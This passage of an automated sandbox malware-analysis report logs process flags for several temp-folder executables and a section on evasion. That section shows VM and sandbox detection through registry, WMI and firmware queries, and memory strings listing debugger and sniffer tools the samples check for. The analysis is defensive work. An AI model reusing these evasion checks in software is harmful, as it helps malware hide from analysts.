Source: C:\Users\user\AppData\Local\Temp\7D14.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7D14.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7D14.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7D14.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7D14.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7D14.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7D14.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7D14.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7D14.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7D14.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7D14.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7D14.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7D14.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7D14.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7D14.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7D14.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\9234.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\9234.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\9234.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\9234.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\9234.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\9234.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\9234.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\9234.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\9234.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\9234.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\9234.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\9234.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\9234.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\9234.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\9234.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\9234.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\9234.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\9234.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\9234.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\9234.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\9234.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\9234.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\9234.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\9234.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\9234.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\9234.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\9234.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\9234.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\9234.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\9234.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\9234.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\9234.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\9234.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\9234.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\9234.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\9234.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\9234.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\9234.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\9234.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\9234.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\9234.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\9234.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\9234.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\9234.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\9234.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\9234.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\9234.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\9234.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\9234.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\9234.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\9234.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\9234.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\9234.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\9234.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\9234.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\9234.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\9234.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\9234.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\9234.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\9234.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\9234.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\9234.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\9234.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\9234.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\9234.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\9234.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\9234.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\9234.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\9234.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\9234.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\9234.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\9234.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\9234.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\9234.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\9234.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\9234.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\9234.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\9234.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\9234.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\9234.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\9234.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\9234.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\9234.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\9234.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\9234.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\9234.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\9234.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\9234.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\9234.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\9234.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\9234.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\9234.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\9234.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\9234.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\9234.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\A203.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\A203.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\A203.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\A203.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\A203.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\A203.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\A203.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\A203.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\A203.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\A203.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\A203.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\A203.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\A203.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\A203.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\A203.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\A203.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\A203.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\A203.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\A203.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\A203.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\A203.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: Process Memory Space: 907.exe PID: 4284, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 4BEF.exe PID: 7284, type: MEMORYSTR

Checks if the current machine is a virtual machine (disk enumeration)

Source: C:\Users\user\Desktop\W73PCbSH71.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\W73PCbSH71.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\W73PCbSH71.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\W73PCbSH71.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\W73PCbSH71.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\W73PCbSH71.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jfhrjta	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jfhrjta	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jfhrjta	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jfhrjta	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jfhrjta	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jfhrjta	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\Temp\etopt.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_DiskDrive
Source: C:\Users\user\AppData\Local\Temp\7D14.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Users\user\AppData\Local\Temp\A203.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\Temp\7D14.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\A203.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController

Query firmware table information (likely to detect VMs)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	System information queried: FirmwareTableInformation
Source: C:\Users\user\AppData\Local\Temp\etopt.exe	System information queried: FirmwareTableInformation
Source: C:\Users\user\AppData\Local\Temp\5A58.exe	System information queried: FirmwareTableInformation
Source: C:\Users\user\AppData\Local\Temp\7D14.exe	System information queried: FirmwareTableInformation
Source: C:\Users\user\AppData\Local\Temp\ABF7.exe	System information queried: FirmwareTableInformation

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\AppData\Local\Temp\7D14.exe

File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000003.2047877802.00000000036C0000.00000004.00001000.00020000.00000000.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2430493808.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2342467116.0000000000400000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: RTP.EXESYSTEMROOT=SETFILETIMESIGNWRITINGSOFT_DOTTEDSYSTEMDRIVETTL EXPIREDUNINSTALLERVBOXSERVICEVMUSRVC.EXEVARIANTINITVIRTUALFREEVIRTUALLOCKWSARECVFROMWARANG_CITIWHITE_SPACEWINDEFENDER[:^XDIGIT:]\DSEFIX.EXEADDITIONALSALARM CLOCKAPPLICATIONASSISTQUEUEAUTHORITIESBAD ADDRESSBAD ARGSIZEBAD M VALUEBAD MESSAGEBAD TIMEDIVBITCOINS.SKBROKEN PIPECAMPAIGN_IDCGOCALL NILCLOBBERFREECLOSESOCKETCOMBASE.DLLCREATED BY CRYPT32.DLLE2.KEFF.ORGEMBEDDED/%SEXTERNAL IPFILE EXISTSFINAL TOKENFLOAT32NAN2FLOAT64NAN1FLOAT64NAN2FLOAT64NAN3GCCHECKMARKGENERALIZEDGET CDN: %WGETPEERNAMEGETSOCKNAMEGLOBALALLOCHTTP2CLIENTHTTP2SERVERHTTPS_PROXYI/O TIMEOUTLOCAL ERRORMSPANMANUALMETHODARGS(MINTRIGGER=MOVE %S: %WMSWSOCK.DLLNETPOLLINITNEXT SERVERNIL CONTEXTOPERA-PROXYORANNIS.COMOUT OF SYNCPARSE ERRORPROCESS: %SREFLECT.SETREFLECTOFFSRETRY-AFTERRUNTIME: P RUNTIME: G RUNTIME: P SCHEDDETAILSECHOST.DLLSECUR32.DLLSERVICE: %SSHELL32.DLLSHORT WRITESTACK TRACESTART PROXYTASKMGR.EXETLS: ALERT(TRACEALLOC(TRAFFIC UPDUNREACHABLEUSERENV.DLLVERSION.DLLVERSION=195WININET.DLLWUP_PROCESS (SENSITIVE) B (
Source: 5A58.exe, 0000001F.00000003.2518407469.0000000003061000.00000004.00000020.00020000.00000000.sdmp, 5A58.exe, 0000001F.00000003.2453113874.0000000003760000.00000004.00000800.00020000.00000000.sdmp, 5A58.exe, 0000001F.00000003.2501733907.0000000003061000.00000004.00000020.00020000.00000000.sdmp, 5A58.exe, 0000001F.00000003.2529972627.0000000003061000.00000004.00000020.00020000.00000000.sdmp, 5A58.exe, 0000001F.00000003.2559608061.0000000003061000.00000004.00000020.00020000.00000000.sdmp, 5A58.exe, 0000001F.00000003.2444930302.0000000003760000.00000004.00000800.00020000.00000000.sdmp, 5A58.exe, 0000001F.00000003.2464146754.0000000003760000.00000004.00000800.00020000.00000000.sdmp, 5A58.exe, 0000001F.00000003.2546743834.0000000003061000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000022.00000003.2676951813.000001B8F6BEA000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000022.00000003.2750963859.000001B8F60D3000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000022.00000003.2704944546.000001B8F60CE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: QEMU-GA.EXE
Source: dialer.exe, 00000022.00000003.2856446018.000001B8F60CB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CVYQZOVJ.EXEQNMTWEVNNJOZGDKXOKCCVYQZOVJ.EXEC:\PROGRAM FILES (X86)\ZRLDTBAVCHHXNHJYFTZOBZESBDZJDLWLCDCFLQKQENFVJTNPARJORXZWFMSJSMCUMOOAAMEPTJXBDAO\QNMTWEVNNJOZGDKXOKCCVYQZOVJ.EXEQNMTWEVNNJOZGDKXOKCCVYQZOVJ.EXEC:\PROGRAM FILES (X86)\ZRLDTBAVCHHXNHJYFTZOBZESBDZJDLWLCDCFLQKQENFVJTNPARJORXZWFMSJSMCUMOOAAMEPTJXBDAO\QNMTWEVNNJOZGDKXOKCCVYQZOVJ.EXEQNMTWEVNNJOZGDKXOKCCVYQZOVJ.EXEC:\PROGRAM FILES (X86)\ZRLDTBAVCHHXNHJYFTZOBZESBDZJDLWLCDCFLQKQENFVJTNPARJORXZWFMSJSMCUMOOAAMEPTJXBDAO\QNMTWEVNNJOZGDKXOKCCVYQZOVJ.EXEQNMTWEVNNJOZGDKXOKCCVYQZOVJ.EXEC:\PROGRAM FILES (X86)\ZRLDTBAVCHHXNHJYFTZOBZESBDZJDLWLCDCFLQKQENFVJTNPARJORXZWFMSJSMCUMOOAAMEPTJXBDAO\QNMTWEVNNJOZGDKXOKCCVYQZOVJ.EXEQNMTWEVNNJOZGDKXOKCCVYQZOVJ.EXEC:\PROGRAM FILES (X86)\ZRLDTBAVCHHXNHJYFTZOBZESBDZJDLWLCDCFLQKQENFVJTNPARJORXZWFMSJSMCUMOOAAMEPTJXBDAO\QNMTWEVNNJOZGDKXOKCCVYQZOVJ.EXEQNMTWEVNNJOZGDKXOKCCVYQZOVJ.EXEC:\PROGRAM FILES (X86)\ZRLDTBAVCHHXNHJYFTZOBZESBDZJDLWLCDCFLQKQENFVJTNPARJORXZWFMSJSMCUMOOAAMEPTJXBDAO\QNMTWEVNNJOZGDKXOKCCVYQZOVJ.EXEQNMTWEVNNJOZGDKXOKCCVYQZOVJ.EXEC:\PROGRAM FILES (X86)\ZRLDTBAVCHHXNHJYFTZOBZESBDZJDLWLCDCFLQKQENFVJTNPARJORXZWFMSJSMCUMOOAAMEPTJXBDAO\QNMTWEVNNJOZGDKXOKCCVYQZOVJ.EXEQNMTWEVNNJOZGDKXOKCCVYQZOVJ.EXEC:\PROGRAM FILES (X86)\ZRLDTBAVCHHXNHJYFTZOBZESBDZJDLWLCDCFLQKQENFVJTNPARJORXZWFMSJSMCUMOOAAMEPTJXBDAO\QNMTWEVNNJOZGDKXOKCCVYQZOVJ.EXEQNMTWEVNNJOZGDKXOKCCVYQZOVJ.EXEC:\PROGRAM FILES (X86)\ZRLDTBAVCHHXNHJYFTZOBZESBDZJDLWLCDCFLQKQENFVJTNPARJORXZWFMSJSMCUMOOAAMEPTJXBDAO\QNMTWEVNNJOZGDKXOKCCVYQZOVJ.EXEQNMTWEVNNJOZGDKXOKCCVYQZOVJ.EXEC:\PROGRAM FILES (X86)\ZRLDTBAVCHHXNHJYFTZOBZESBDZJDLWLCDCFLQKQENFVJTNPARJORXZWFMSJSMCUMOOAAMEPTJXBDAO\QNMTWEVNNJOZGDKXOKCCVYQZOVJ.EXEQNMTWEVNNJOZGDKXOKCCVYQZOVJ.EXEC:\PROGRAM FILES (X86)\ZRLDTBAVCHHXNHJYFTZOBZESBDZJDLWLCDCFLQKQENFVJTNPARJORXZWFMSJSMCUMOOAAMEPTJXBDAO\QNMTWEVNNJOZGDKXOKCCVYQZOVJ.EXEREGSVCS.EXEC:\WINDOWS\MICROSOFT.NET\FRAMEWORK\V4.0.30319\REGSVCS.EXEINSTALLSETUP8.EXEC:\USERS\user\APPDATA\LOCAL\TEMP\INSTALLSETUP8.EXEBROOMSETUP.EXEC:\USERS\user\APPDATA\LOCAL\TEMP\BROOMSETUP.EXETUC4.EXEC:\USERS\user\APPDATA\LOCAL\TEMP\TUC4.EXETUC4.TMPC:\USERS\user\APPDATA\LOCAL\TEMP\IS-5MF81.TMP\TUC4.TMPETOPT.EXEC:\USERS\user\APPDATA\LOCAL\TEMP\ETOPT.EXETUC4.EXEC:\USERS\user\APPDATA\LOCAL\TEMP\TUC4.EXETUC4.TMPC:\USERS\user\APPDATA\LOCAL\TEMP\IS-OKLT8.TMP\TUC4.TMPNSI4BEF.TMP.EXEC:\USERS\user\APPDATA\LOCAL\TEMP\NSI4BEF.TMP.EXE5A58.EXEC:\USERS\user\APPDATA\LOCAL\TEMP\5A58.EXEDIALER.EXEC:\WINDOWS\SYSTEM32\DIALER.EXE7D14.EXEC:\USERS\user\APPDATA\LOCAL\TEMP\7D14.EXE9234.EXEC:\USERS\user\APPDATA\LOCAL\TEMP\9234.EXEA203.EXEC:\USERS\user\APPDATA\LOCAL\TEMP\A203.EXEABF7.EXEC:\USERS\user\APPDATA\LOCAL\TEMP\ABF7.EXEVGHRJTAC:\USERS\user\APPDATA\ROAMING\VGHRJTAXQFUEYDABRJUHPTX.EXEC:\PROGRAMDATA\XQFUEYDABRJUHPTX.EXEDATAPUMPCRT.EXEC:\PROGRAM FILES (X86)\DATAPUMPCRT\DATAPUMPCRT.EXEQEMU-GA.EXEC:\USERS\user\APPDATA\ROAMING\MICROSOFT\WINDOWS\START MENU\PROGRAMS\STARTUP\QEMU-GA.EXEWMIPRVSE.EXEXQFUEYDABRJUHPTX.EXEC:\PROGRAMDATA\XQFUEYDABRJUHPTX.EXEWMIADAP.EXET
Source: jfhrjta, 00000003.00000002.1925698181.0000000000570000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ASWHOOK
Source: etopt.exe, 0000001A.00000002.2798326413.0000000004F30000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SNIFFERPRO.EXECHARLES.EXEIRIS.EXEHTTPDEBUGGERPRO.EXESRSNIFFER.EXEOSTINATO.EXEWPE.EXEWSOCKEXPERT_CN.EXEWSOCKEXPERT.EXESMARTSNIFF.EXEHOOKME.EXENETWORKTRAFFICVIEW.EXETCPMON.EXESMSNIFF.EXEHTTPANALYZERSTDV7.EXEHTTPANALYZERSTDV6.EXEHTTPANALYZERSTDV5.EXEHTTPANALYZERSTDV4.EXECSNAS.EXEOLLYICE.EXEOLLYDBG.EXEWINDBG.EXESOFTICE.EXEWIRESHARK.EXEFIDDLER.EXE%08X%08XROOT\WMIMSSMBIOS_RAWSMBIOSTABLESSMBIOSDATANULL STRINGVIRTUALVIRTUALPACKIDMIDSIDMAC1MAC2BOARDMANUSNPRODUCTCPUNAMECORENUMSYSMAJORMINORBUILDRELEASEX64NOTEPADVMADMINPOWERONLOCALESOFTWARE\CHROMIUMLOCINFOSTSDQUERYLOCATIONCOUNTRYPROVINCECITYISPCOUNTYLONLATCLTINFOINSTCANDENYAPPKEYDENYAPPSSUCCNEEDRESPUNINSTAPPACTIVESOFTWARE\BAIDU\BDLOGCUR_VERSIONVMTOOLSD.EXEWMACTHLP.EXEC:\XWSGCZYJBR(%XHUX%HUX%HU)
Source: 5A58.exe, 0000001F.00000003.2559906018.0000000003760000.00000004.00000800.00020000.00000000.sdmp, 5A58.exe, 0000001F.00000003.2518549986.0000000003760000.00000004.00000800.00020000.00000000.sdmp, 5A58.exe, 0000001F.00000003.2547050793.0000000003760000.00000004.00000800.00020000.00000000.sdmp, 5A58.exe, 0000001F.00000003.2501856958.0000000003760000.00000004.00000800.00020000.00000000.sdmp, 5A58.exe, 0000001F.00000003.2530136198.0000000003760000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: QEMU-GA.EXEP
Source: dialer.exe, 00000022.00000003.2750963859.000001B8F60D3000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000022.00000003.2704944546.000001B8F60CE000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000022.00000003.2700493104.000001B8F60CB000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000022.00000003.2723023170.000001B8F60D3000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000022.00000003.2856446018.000001B8F60CB000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000022.00000003.2713011554.000001B8F60CB000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000022.00000003.2677582742.000001B8F60DC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C:\USERS\user\APPDATA\ROAMING\MICROSOFT\WINDOWS\START MENU\PROGRAMS\STARTUP\QEMU-GA.EXE
